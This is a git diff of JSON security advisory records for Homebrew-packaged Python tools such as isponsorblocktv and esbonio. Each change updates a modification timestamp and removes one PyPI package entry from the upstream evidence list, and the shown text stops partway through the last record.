a/advisories/BREW-eralchemy-CVE-2019-7548.json b/advisories/BREW-eralchemy-CVE-2019-7548.json index 73c20e2ce8c..2d7735d6c89 100644 --- a/advisories/BREW-eralchemy-CVE-2019-7548.json +++ b/advisories/BREW-eralchemy-CVE-2019-7548.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-eralchemy-CVE-2019-7548", "published": "2026-08-13T16:45:06Z", - "modified": "2026-08-13T16:45:06Z", + "modified": "2026-09-10T19:07:43Z", "upstream": [ "GHSA-38fc-9xqv-7f7q", "CVE-2019-7548", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "sqlalchemy", - "subject_version": "2.0.49", - "key": "pkg:pypi/sqlalchemy@2.0.49", - "resource": "sqlalchemy" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-esbonio-CVE-2009-5042.json b/advisories/BREW-esbonio-CVE-2009-5042.json index d14e5369c30..ad180a18c46 100644 --- a/advisories/BREW-esbonio-CVE-2009-5042.json +++ b/advisories/BREW-esbonio-CVE-2009-5042.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-esbonio-CVE-2009-5042", "published": "2026-08-13T16:45:08Z", - "modified": "2026-08-13T16:45:08Z", + "modified": "2026-09-10T19:07:45Z", "upstream": [ "GHSA-cg75-6938-wx58", "CVE-2009-5042", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "docutils", - "subject_version": "0.23", - "key": "pkg:pypi/docutils@0.23", - "resource": "docutils" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-esbonio-CVE-2018-1000518.json b/advisories/BREW-esbonio-CVE-2018-1000518.json index c96b486719b..875dfb32bfc 100644 --- a/advisories/BREW-esbonio-CVE-2018-1000518.json +++ b/advisories/BREW-esbonio-CVE-2018-1000518.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-esbonio-CVE-2018-1000518", "published": "2026-08-13T16:45:08Z", - "modified": "2026-08-13T16:45:08Z", + "modified": "2026-09-10T19:07:45Z", "upstream": [ "GHSA-6g87-ff9q-v847", "CVE-2018-1000518", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "websockets", - "subject_version": "16.0", - "key": "pkg:pypi/websockets@16.0", - "resource": "websockets" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-esbonio-CVE-2021-33880.json b/advisories/BREW-esbonio-CVE-2021-33880.json index d537565637c..32d3ca47f28 100644 --- a/advisories/BREW-esbonio-CVE-2021-33880.json +++ b/advisories/BREW-esbonio-CVE-2021-33880.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-esbonio-CVE-2021-33880", "published": "2026-08-13T16:45:08Z", - "modified": "2026-08-13T16:45:08Z", + "modified": "2026-09-10T19:07:45Z", "upstream": [ "GHSA-8ch4-58qp-g3mp", "CVE-2021-33880", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "websockets", - "subject_version": "16.0", - "key": "pkg:pypi/websockets@16.0", - "resource": "websockets" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2014-1829.json b/advisories/BREW-isponsorblocktv-CVE-2014-1829.json index fa6595c553a..1782e76aad1 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2014-1829.json +++ b/advisories/BREW-isponsorblocktv-CVE-2014-1829.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2014-1829", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-13T17:00:03Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-cfj3-7x9c-4p3h", "CVE-2014-1829", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2014-1830.json b/advisories/BREW-isponsorblocktv-CVE-2014-1830.json index 957b54e65ca..db239c25e8a 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2014-1830.json +++ b/advisories/BREW-isponsorblocktv-CVE-2014-1830.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2014-1830", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-13T17:00:03Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-652x-xj99-gmcc", "CVE-2014-1830", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2015-2296.json b/advisories/BREW-isponsorblocktv-CVE-2015-2296.json index 585420b8834..18c97961f60 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2015-2296.json +++ b/advisories/BREW-isponsorblocktv-CVE-2015-2296.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2015-2296", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-13T17:00:03Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-pg2w-x9wp-vw92", "CVE-2015-2296", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2015-5237.json b/advisories/BREW-isponsorblocktv-CVE-2015-5237.json index 19c4596c70f..ad94bb1c90c 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2015-5237.json +++ b/advisories/BREW-isponsorblocktv-CVE-2015-5237.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2015-5237", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-23T20:53:54Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-jwvw-v7c5-m82h", "CVE-2015-5237", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "protobuf", - "subject_version": "7.36.0", - "key": "pkg:pypi/protobuf@7.36.0", - "resource": "protobuf" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2015-8557.json b/advisories/BREW-isponsorblocktv-CVE-2015-8557.json index 117c8f60073..eb8db3bd9a8 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2015-8557.json +++ b/advisories/BREW-isponsorblocktv-CVE-2015-8557.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2015-8557", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-23T20:53:54Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-fff8-4w9p-7v76", "CVE-2015-8557", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.21.0", - "key": "pkg:pypi/pygments@2.21.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2016-9015.json b/advisories/BREW-isponsorblocktv-CVE-2016-9015.json index 0a54116c627..3ad5107eb76 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2016-9015.json +++ b/advisories/BREW-isponsorblocktv-CVE-2016-9015.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2016-9015", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-13T17:00:03Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-v4w5-p2hg-8fh6", "CVE-2016-9015", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2018-18074.json b/advisories/BREW-isponsorblocktv-CVE-2018-18074.json index b69540ac518..6511356ac9c 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2018-18074.json +++ b/advisories/BREW-isponsorblocktv-CVE-2018-18074.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2018-18074", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-13T17:00:03Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-x84v-xcm2-53pg", "CVE-2018-18074", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2018-20060.json b/advisories/BREW-isponsorblocktv-CVE-2018-20060.json index 1c4982abb46..4925d9837c7 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2018-20060.json +++ b/advisories/BREW-isponsorblocktv-CVE-2018-20060.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2018-20060", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-13T17:00:03Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-www2-v7xj-xrc6", "CVE-2018-20060", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2018-25091.json b/advisories/BREW-isponsorblocktv-CVE-2018-25091.json index 9f68a3e115a..67ec5e673bf 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2018-25091.json +++ b/advisories/BREW-isponsorblocktv-CVE-2018-25091.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2018-25091", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-13T17:00:03Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-gwvm-45gx-3cf8", "CVE-2018-25091", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2019-11236.json b/advisories/BREW-isponsorblocktv-CVE-2019-11236.json index 3cb61584540..07887d158d5 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2019-11236.json +++ b/advisories/BREW-isponsorblocktv-CVE-2019-11236.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2019-11236", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-13T17:00:03Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-r64q-w8jr-g9qp", "CVE-2019-11236", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2019-11324.json b/advisories/BREW-isponsorblocktv-CVE-2019-11324.json index de5e3d6bbdf..602bf422a43 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2019-11324.json +++ b/advisories/BREW-isponsorblocktv-CVE-2019-11324.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2019-11324", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-13T17:00:03Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-mh33-7rrq-662w", "CVE-2019-11324", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2020-26137.json b/advisories/BREW-isponsorblocktv-CVE-2020-26137.json index 2c4dfa9ef8a..c0e033322d8 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2020-26137.json +++ b/advisories/BREW-isponsorblocktv-CVE-2020-26137.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2020-26137", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-13T17:00:03Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-wqvq-5m8c-6g24", "CVE-2020-26137", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2020-7212.json b/advisories/BREW-isponsorblocktv-CVE-2020-7212.json index 295f43caedf..073bdbf1fa1 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2020-7212.json +++ b/advisories/BREW-isponsorblocktv-CVE-2020-7212.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2020-7212", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-13T17:00:03Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-hmv2-79q8-fv6g", "CVE-2020-7212", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2021-20270.json b/advisories/BREW-isponsorblocktv-CVE-2021-20270.json index 931ecf1335b..1473c3ec565 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2021-20270.json +++ b/advisories/BREW-isponsorblocktv-CVE-2021-20270.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2021-20270", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-23T20:53:54Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-9w8r-397f-prfh", "CVE-2021-20270", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.21.0", - "key": "pkg:pypi/pygments@2.21.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2021-21330.json b/advisories/BREW-isponsorblocktv-CVE-2021-21330.json index 7412d3650ad..d9eb7d7256f 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2021-21330.json +++ b/advisories/BREW-isponsorblocktv-CVE-2021-21330.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2021-21330", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-23T20:53:54Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-v6wp-4m6f-gcjg", "CVE-2021-21330", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2021-27291.json b/advisories/BREW-isponsorblocktv-CVE-2021-27291.json index 8db6c854dc7..f5f5764ea8c 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2021-27291.json +++ b/advisories/BREW-isponsorblocktv-CVE-2021-27291.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2021-27291", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-23T20:53:54Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-pq64-v7f5-gqh8", "CVE-2021-27291", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.21.0", - "key": "pkg:pypi/pygments@2.21.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2021-28363.json b/advisories/BREW-isponsorblocktv-CVE-2021-28363.json index 8d24e99dd71..5cecec2340a 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2021-28363.json +++ b/advisories/BREW-isponsorblocktv-CVE-2021-28363.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2021-28363", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-13T17:00:03Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-5phf-pp7p-vc2r", "CVE-2021-28363", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2021-33503.json b/advisories/BREW-isponsorblocktv-CVE-2021-33503.json index 8d9ed0f5b74..d0648478bc4 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2021-33503.json +++ b/advisories/BREW-isponsorblocktv-CVE-2021-33503.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2021-33503", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-13T17:00:03Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-q2q7-5pp4-w6pg", "CVE-2021-33503", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2022-1941.json b/advisories/BREW-isponsorblocktv-CVE-2022-1941.json index 03e94389019..ea5159b4aef 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2022-1941.json +++ b/advisories/BREW-isponsorblocktv-CVE-2022-1941.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2022-1941", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-23T20:53:54Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-8gq9-2x98-w8hf", "CVE-2022-1941", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "protobuf", - "subject_version": "7.36.0", - "key": "pkg:pypi/protobuf@7.36.0", - "resource": "protobuf" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2022-40896.json b/advisories/BREW-isponsorblocktv-CVE-2022-40896.json index 2914fc351f1..377c7fa190b 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2022-40896.json +++ b/advisories/BREW-isponsorblocktv-CVE-2022-40896.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2022-40896", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-23T20:53:54Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-mrwq-x4v8-fh7p", "CVE-2022-40896", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.21.0", - "key": "pkg:pypi/pygments@2.21.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2023-26302.json b/advisories/BREW-isponsorblocktv-CVE-2023-26302.json index 56e9bbb7c7a..41afef1a94a 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2023-26302.json +++ b/advisories/BREW-isponsorblocktv-CVE-2023-26302.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2023-26302", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-13T17:00:03Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-jrwr-5x3p-hvc3", "CVE-2023-26302", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "markdown-it-py", - "subject_version": "4.2.0", - "key": "pkg:pypi/markdown-it-py@4.2.0", - "resource": "markdown-it-py" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2023-26303.json b/advisories/BREW-isponsorblocktv-CVE-2023-26303.json index 43c412f58e3..12018cd49c6 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2023-26303.json +++ b/advisories/BREW-isponsorblocktv-CVE-2023-26303.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2023-26303", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-13T17:00:03Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-vrjv-mxr7-vjf8", "CVE-2023-26303", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "markdown-it-py", - "subject_version": "4.2.0", - "key": "pkg:pypi/markdown-it-py@4.2.0", - "resource": "markdown-it-py" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2023-32681.json b/advisories/BREW-isponsorblocktv-CVE-2023-32681.json index c8d9b202c51..f964d1deb1d 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2023-32681.json +++ b/advisories/BREW-isponsorblocktv-CVE-2023-32681.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2023-32681", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-13T17:00:03Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-j8r2-6x86-q33q", "CVE-2023-32681", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2023-37276.json b/advisories/BREW-isponsorblocktv-CVE-2023-37276.json index a9a6649915a..21179e651aa 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2023-37276.json +++ b/advisories/BREW-isponsorblocktv-CVE-2023-37276.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2023-37276", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-23T20:52:51Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-45c4-8wx5-qw6w", "CVE-2023-37276", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2023-43804.json b/advisories/BREW-isponsorblocktv-CVE-2023-43804.json index 43abe4d1b4d..16b523254f0 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2023-43804.json +++ b/advisories/BREW-isponsorblocktv-CVE-2023-43804.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2023-43804", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-13T17:00:03Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-v845-jxx5-vc9f", "CVE-2023-43804", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2023-45803.json b/advisories/BREW-isponsorblocktv-CVE-2023-45803.json index dd5c56fc76b..01753059ded 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2023-45803.json +++ b/advisories/BREW-isponsorblocktv-CVE-2023-45803.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2023-45803", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-13T17:00:03Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-g4mx-q9vg-27p4", "CVE-2023-45803", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2023-47627.json b/advisories/BREW-isponsorblocktv-CVE-2023-47627.json index c37ea29b3e7..ed56828fb84 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2023-47627.json +++ b/advisories/BREW-isponsorblocktv-CVE-2023-47627.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2023-47627", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-23T20:53:54Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-gfw2-4jvh-wgfg", "CVE-2023-47627", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2023-47641.json b/advisories/BREW-isponsorblocktv-CVE-2023-47641.json index b57b057856d..9f9b64b4605 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2023-47641.json +++ b/advisories/BREW-isponsorblocktv-CVE-2023-47641.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2023-47641", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-23T20:53:54Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-xx9p-xxvh-7g8j", "CVE-2023-47641", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2023-49081.json b/advisories/BREW-isponsorblocktv-CVE-2023-49081.json index 14b8f9fb9bc..3e660af1acb 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2023-49081.json +++ b/advisories/BREW-isponsorblocktv-CVE-2023-49081.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2023-49081", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-23T20:53:54Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-q3qx-c6g2-7pw2", "CVE-2023-49081", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - 